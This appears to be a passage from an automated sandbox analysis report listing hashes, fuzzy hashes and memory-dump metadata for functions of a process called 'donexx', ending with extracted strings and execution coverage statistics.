                                                                            • Opcode Fuzzy Hash: c9806a5ef0790725c33231bcd31551c8d3fedf0df19e595e30ee1108d18d2416
                                                                            • Instruction Fuzzy Hash: F1213A71508240DFDB15DF54DDC0B16BF65FB94324F24C569E8055B286C336E896CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 320c6e032a0579d39d579abc3c0d82152eb5b4c1cb79044729ddfe6b06ad810a
                                                                            • Instruction ID: e69d3abbe9b94c3b60dfa5be6f05be8ae77c25dce3817f5a5091cf9defe3a8ab
                                                                            • Opcode Fuzzy Hash: 320c6e032a0579d39d579abc3c0d82152eb5b4c1cb79044729ddfe6b06ad810a
                                                                            • Instruction Fuzzy Hash: 6D215770A00215DFDB05DF65C988BAEBBB2BF48324F14406AE402B73A0DF759D86CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8189bd2053c9406db9ef1d86d1c13163611902855d0a0c11d3836b597b0a7b6
                                                                            • Instruction ID: a1754f0aa711b25065d59a01c156aac5c7e8ba099901adf31116781951267740
                                                                            • Opcode Fuzzy Hash: b8189bd2053c9406db9ef1d86d1c13163611902855d0a0c11d3836b597b0a7b6
                                                                            • Instruction Fuzzy Hash: 94216B71A00215DFDB05CF65C9887ADFBB2BF48324F1845AAE402A73A0DB719D42CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78180dac68e48d8ec97cefbb306fc80bbf8148b11bec84a45878391ba35478b0
                                                                            • Instruction ID: 6f6fa298023f1578dcac1ed42a93dc47eb5246c4b72a18d9a14c3c58a0fd53dc
                                                                            • Opcode Fuzzy Hash: 78180dac68e48d8ec97cefbb306fc80bbf8148b11bec84a45878391ba35478b0
                                                                            • Instruction Fuzzy Hash: EA218975E106158FCB15DFA4C884BAEB7F1FF88704F014469E91AE7350EB38A806CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8342fd8bee178f326b960af28d7893c7bb2afc15c869b4ed4b935f7af3d59a24
                                                                            • Instruction ID: 593759d4470631cb0ae2d61f3137bf73961088c80525d65753c342fbec78f443
                                                                            • Opcode Fuzzy Hash: 8342fd8bee178f326b960af28d7893c7bb2afc15c869b4ed4b935f7af3d59a24
                                                                            • Instruction Fuzzy Hash: 4321A130A503158FDB14EB78E6467AF7BF6EB85300F008828E40AD7695DF759D068BD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f296a99eef3c92b7b43cc5e43d7c099e1a659b0dfa30800bd6d0ab55550198a5
                                                                            • Instruction ID: 558e808781cd0a2227f49f3acd57d5f641754783b21c2b2acae543a332444db9
                                                                            • Opcode Fuzzy Hash: f296a99eef3c92b7b43cc5e43d7c099e1a659b0dfa30800bd6d0ab55550198a5
                                                                            • Instruction Fuzzy Hash: E8113B76B446414FCB079764DD506ADFBF3FF9A620B248196F1089F261EE21DC468780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0a661fa7fa96733024624ae1faa48a92389c08e2773815986a8619c0ddfaafa
                                                                            • Instruction ID: f273d9996e08c0c5d5ebcd6dab2199b995240fef54b3786e75979134498d32fb
                                                                            • Opcode Fuzzy Hash: b0a661fa7fa96733024624ae1faa48a92389c08e2773815986a8619c0ddfaafa
                                                                            • Instruction Fuzzy Hash: BF217134F002598BEF05DFA8E944AEE7BF6BF88214F008426E505F7254DB3499059B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5e28995bb4143d810b3fc3938e651f07a297bce5783c278e569dbb1e3528ced5
                                                                            • Instruction ID: 133c85139d2bfae0f90ecec5b269ad628e19a1dc8fac0123705740c47a340236
                                                                            • Opcode Fuzzy Hash: 5e28995bb4143d810b3fc3938e651f07a297bce5783c278e569dbb1e3528ced5
                                                                            • Instruction Fuzzy Hash: 6C21A178E00209AFCB44DBB4D8558AFBBB6EF84700F408468E905AB354EF71AD06CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ee6d2c8e296e2ee399a15bd2317bee8422a6d62bc1bc0e1de42aadca843fec66
                                                                            • Instruction ID: 06eff61250e06c75d12279febe03c0bc234b156a6b2e8fdafdf5bd88be7ed019
                                                                            • Opcode Fuzzy Hash: ee6d2c8e296e2ee399a15bd2317bee8422a6d62bc1bc0e1de42aadca843fec66
                                                                            • Instruction Fuzzy Hash: 2D21AE38E012499FCB04DF74D9554AEBBB6EF84300B1089A8D505AB365CF35A907CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7feca98641e69c3c316b491f85d1bf5206acbc957b2e9dbd6a3d41b1563a9e2a
                                                                            • Instruction ID: 48cac421072522e0f248576a8793fff007ed4fe4cf1e7425ff20993192ed4e2c
                                                                            • Opcode Fuzzy Hash: 7feca98641e69c3c316b491f85d1bf5206acbc957b2e9dbd6a3d41b1563a9e2a
                                                                            • Instruction Fuzzy Hash: 2A11BB75E002018FCB659F688985BAE7BF2AB88310F158429F955DB280DF71C902CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408337413.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_e0d000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e87306563b5619f7196d99b150be5a71ccd3a45526b644d63ba900d9ba2ba174
                                                                            • Instruction ID: 914390c04c9a647a16c9d77b3921cc3bc64d89bc4743b764feb2298503a445df
                                                                            • Opcode Fuzzy Hash: e87306563b5619f7196d99b150be5a71ccd3a45526b644d63ba900d9ba2ba174
                                                                            • Instruction Fuzzy Hash: C021A276504240DFDB16CF54D9C4B16BF71FB84314F24C5A9DC085B656C33AD4AACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b51a714bd83b9e96b824d39d76e5e592963a9c56751578e47bf3ec65c065796
                                                                            • Instruction ID: c0f7252add028d7e9f6bb1cd39d249d2b522288dd6930ae0a4961293e2ad000e
                                                                            • Opcode Fuzzy Hash: 6b51a714bd83b9e96b824d39d76e5e592963a9c56751578e47bf3ec65c065796
                                                                            • Instruction Fuzzy Hash: B0116D78E002099FCB44EBB5D95586FBBB6EF88700B508468E505A7354EF71ED06CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8b030fe3cec1ff215c8e2f9d675e65dc96a51f7aedc25b978a0f7846f41e373
                                                                            • Instruction ID: cc2862bfeb4d2f8542da831243cf221932cc3ec94f8675c6e47b6ab8a2d12082
                                                                            • Opcode Fuzzy Hash: a8b030fe3cec1ff215c8e2f9d675e65dc96a51f7aedc25b978a0f7846f41e373
                                                                            • Instruction Fuzzy Hash: F8115B302006148FC321AB28E54076AB7E2FF48320F208B24F559873E6DFB6AC458FC1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408337413.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_e0d000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction ID: 2bc25827bb2c80e95a39b1295354a25a05ecaeb9a675948210c0c201be9e8247
                                                                            • Opcode Fuzzy Hash: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction Fuzzy Hash: A0112672404280CFCB12CF50D9C0B16BF71FB84324F24C6A9D8084B656C33AE89ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c7521370726db148ac348096a43593cccdb0236628c56e6e5badb37dbc689b30
                                                                            • Instruction ID: cc2234abf76a1ecfaa0a454491615e90e9e90c2f651676eda4409a121d5dd596
                                                                            • Instruction ID: 3d00d3aa1190e85a7f426d9e232cc7555e24ecb0c152450dc8c373f9d6369f8b
                                                                            • Opcode Fuzzy Hash: 8fa599d8fee00b3a7edd5798783018045ccba0f4782663d3cde6af89fa4d8707
                                                                            • Instruction Fuzzy Hash: E7F017757045145FD2549A5EDC84F57B7EAFF88A61B24806AF109CB3A5DA60EC0186A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8fa599d8fee00b3a7edd5798783018045ccba0f4782663d3cde6af89fa4d8707
                                                                            • Instruction ID: fc17aca95b6ac55c3f776652cfb73543cfa020d124eec602768d339bc70476f2
                                                                            • Opcode Fuzzy Hash: 8fa599d8fee00b3a7edd5798783018045ccba0f4782663d3cde6af89fa4d8707
                                                                            • Instruction Fuzzy Hash: 6AF03A357046145FD3149B5ED884F57B7EEEFC9B61B248069F109CB365EAB0EC018AA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d109db4f3650bacd45acf421a827d973bb0bf0a653baeaf635c4cfb0474260e9
                                                                            • Instruction ID: 8f74e2b453ea04829648a717b1403146fceb9ae7f5436db8f3c42d4cb132829c
                                                                            • Opcode Fuzzy Hash: d109db4f3650bacd45acf421a827d973bb0bf0a653baeaf635c4cfb0474260e9
                                                                            • Instruction Fuzzy Hash: CBF0AE317086841FD316876D5890AA7BFF9EFC9350714409AF0C9C7366D961DC03C750
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 516c9edfc2ed7ff1f0a2742e66b993345d453aeefd1ed24493225e58c9e016c2
                                                                            • Instruction ID: abf00ca4cfa1466b7ef69e68fc8b746c53288916a1adc386a1d26c1be99d07c4
                                                                            • Opcode Fuzzy Hash: 516c9edfc2ed7ff1f0a2742e66b993345d453aeefd1ed24493225e58c9e016c2
                                                                            • Instruction Fuzzy Hash: 78F0A0727045412FE315866E9C81B57ABEAFFC9751B24806AF04CCB7A5DA609C028750
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ee4b963f64febd7a86d5ee9ffe4055b1fba278f06ae83c1eceb33422064f632
                                                                            • Instruction ID: 4f2182d76e5da57b16acb1e0503d6ff60dbded98ff650099d00fac6986189da2
                                                                            • Opcode Fuzzy Hash: 2ee4b963f64febd7a86d5ee9ffe4055b1fba278f06ae83c1eceb33422064f632
                                                                            • Instruction Fuzzy Hash: CFF0B4321106459BC324EF7CF681586BBE6FF943317108F24D0944B6EAEF71A98A87E4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c224e9805ded21e27b5e568fecec3b4d5f09c0057e5b5dea0d21e51d547b7d64
                                                                            • Instruction ID: 55389328fdb73f9e411b550eaf5439a101d9693fe9c95f9a55f60ecc097a920b
                                                                            • Opcode Fuzzy Hash: c224e9805ded21e27b5e568fecec3b4d5f09c0057e5b5dea0d21e51d547b7d64
                                                                            • Instruction Fuzzy Hash: DFF0A7B2E046549FDB0ACFA4D58D3DDBFB69B40315F19C49AD009D7290DF344A81CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 33cba234b7b80893fb7f7d8aaf5aca3efe6e0edd98c9db4b8be5fd556ccce984
                                                                            • Instruction ID: 7399271a7c3c64cc51edf5ebcd29bb6b3f986fbdd2f3d2a75e5a9a510b301773
                                                                            • Opcode Fuzzy Hash: 33cba234b7b80893fb7f7d8aaf5aca3efe6e0edd98c9db4b8be5fd556ccce984
                                                                            • Instruction Fuzzy Hash: 5FE04F327042289FDB08DBA8A8405DA7BEDDB49275F1000BBE60CC3650EF32D9418790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 312b4a3fb7d3444af09d09c8f2475ce82d3206c27197908688c15932e9f6e951
                                                                            • Instruction ID: 6cac503f7dd2d6d4427b068e661157b95a90e3100196da408a64e0a336190bb9
                                                                            • Opcode Fuzzy Hash: 312b4a3fb7d3444af09d09c8f2475ce82d3206c27197908688c15932e9f6e951
                                                                            • Instruction Fuzzy Hash: F0F03071E04618AFDB0ACFA4D0886DDBFBA9B44315F14C0AAE00997240DF745A85C784
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 263556cc84f816296fa59c32cfabef0475733008483f0057040e9747205e59e2
                                                                            • Instruction ID: 6bf4648222ec35bb79b2f340f12ecc53b8f5caf5b515794d398877eb26b780a7
                                                                            • Opcode Fuzzy Hash: 263556cc84f816296fa59c32cfabef0475733008483f0057040e9747205e59e2
                                                                            • Instruction Fuzzy Hash: 64F030B4C053899FDB51DFB888452AFBFF5AF48210F10446AD959E2201E7304655CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5d602cf3065f11c29689467f28829182324a333af24663e73ae29cee7e095c3
                                                                            • Instruction ID: a5f7997e90243648e37bb5c21189c1090aed11df25bd44c36b00508637484732
                                                                            • Opcode Fuzzy Hash: c5d602cf3065f11c29689467f28829182324a333af24663e73ae29cee7e095c3
                                                                            • Instruction Fuzzy Hash: CFE0D873914208EFC711CF70EC456BE77B8DB05205F0405EAD809C6200EE358911CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f084648ff2f9a4a564b719c22d8327420025af75f3bb5adcedb1d8482b1dc43e
                                                                            • Instruction ID: c1d4e3921d6951b7d85a46928e07a61549b3352ef2939e328c3fdf9f1dd93367
                                                                            • Opcode Fuzzy Hash: f084648ff2f9a4a564b719c22d8327420025af75f3bb5adcedb1d8482b1dc43e
                                                                            • Instruction Fuzzy Hash: 46E0DFB2E41248AFDB00DBB4E9427AFBBB1EB95300F1184A9D804D7280EA314E069B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9fbf36997a6fc61c14f579a11ef0c17b05443bd33f8244bb3f9368759505d362
                                                                            • Instruction ID: e915d21455b84cd7860a1c57297b2b0679f1acf3afe7c8e871f535b6c883ee51
                                                                            • Opcode Fuzzy Hash: 9fbf36997a6fc61c14f579a11ef0c17b05443bd33f8244bb3f9368759505d362
                                                                            • Instruction Fuzzy Hash: E8E02230909289AFC701CFB495110AF7FB0EF46300F104089C448D3286D9315F068B81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30bdedf156c468b6957f9cc691982d71d06739bbd85352d24e9142c0b863a16e
                                                                            • Instruction ID: f0c12e948cb7a4b6a784bd2232bc86131c2213c0810f34d7eb52e61157708644
                                                                            • Opcode Fuzzy Hash: 30bdedf156c468b6957f9cc691982d71d06739bbd85352d24e9142c0b863a16e
                                                                            • Instruction Fuzzy Hash: 56D0123865A3851FDB638BB066D62F73FBADE1385830C44E9ACC5CA503D902D45FA700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b7a58768d2668a8d113094527c949a4b6fa92161e338c7bd9f50aa62618d462
                                                                            • Instruction ID: 8d8726147206ac1aa1bcfae1782ed997ad49d3eb916207431f70d8e0dfd08da9
                                                                            • Opcode Fuzzy Hash: 3b7a58768d2668a8d113094527c949a4b6fa92161e338c7bd9f50aa62618d462
                                                                            • Instruction Fuzzy Hash: 55E01270A4120CEFDB00EFB4EA41A6FB7B9EB45300F5084A9E904D7244ED315F059B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad761be31b7dd6334eb46fcf889a4c1c58db8d37e15a62712b32bea8f2879ec8
                                                                            • Instruction ID: 3e6eade669f7eb23d4d4bf870e7161a92e2f7c0349a2edf26e8e7aaeeb52cdaa
                                                                            • Opcode Fuzzy Hash: ad761be31b7dd6334eb46fcf889a4c1c58db8d37e15a62712b32bea8f2879ec8
                                                                            • Instruction Fuzzy Hash: F6E0EC30A1124CEFC700EFA4D60155E77A9EB45300F504599D80893244ED319F159791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f79203dc123a22831d5b6466b81d7b0a848887755a62a0bcb6a8f7a907149914
                                                                            • Instruction ID: f5ac947a0b9a64122dd6af4fad9c1b6b6914166e6f56b4765031420cd50c132f
                                                                            • Opcode Fuzzy Hash: f79203dc123a22831d5b6466b81d7b0a848887755a62a0bcb6a8f7a907149914
                                                                            • Instruction Fuzzy Hash: 5CD0A73019DBC49FC7031370142905A3F988DD6B0134008D6E0819B052CE4058458311
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b07c23826501f65f0dc89b15c5000fa489cbb5207a9f3073588dfd41e85cc0f
                                                                            • Instruction ID: c70e56de1c258737dbfeb205feb05891328bb2281453088e724ce37596679ca3
                                                                            • Opcode Fuzzy Hash: 8b07c23826501f65f0dc89b15c5000fa489cbb5207a9f3073588dfd41e85cc0f
                                                                            • Instruction Fuzzy Hash: 61D0C9318593D5DFCB131B78B8AD0DE7F35AD47225B0848E6D8C98A463CA22982BDB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f478468b7cfe3886316cc63d303d1b0e547accdc1025e2090f5b120bc4f6ef61
                                                                            • Instruction ID: 0b02d4c0b5fc53b527915db3fd1cf36093249ffafff3b4712193d7f6de294196
                                                                            • Opcode Fuzzy Hash: f478468b7cfe3886316cc63d303d1b0e547accdc1025e2090f5b120bc4f6ef61
                                                                            • Instruction Fuzzy Hash: AEB092313A42080BEA5097B5B88472637CC9780A18F4404A5B40CC1A41EA46E4A12044
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$\$jjjjjj$$`q$$`q
                                                                            • API String ID: 0-713343189
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:5.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:62
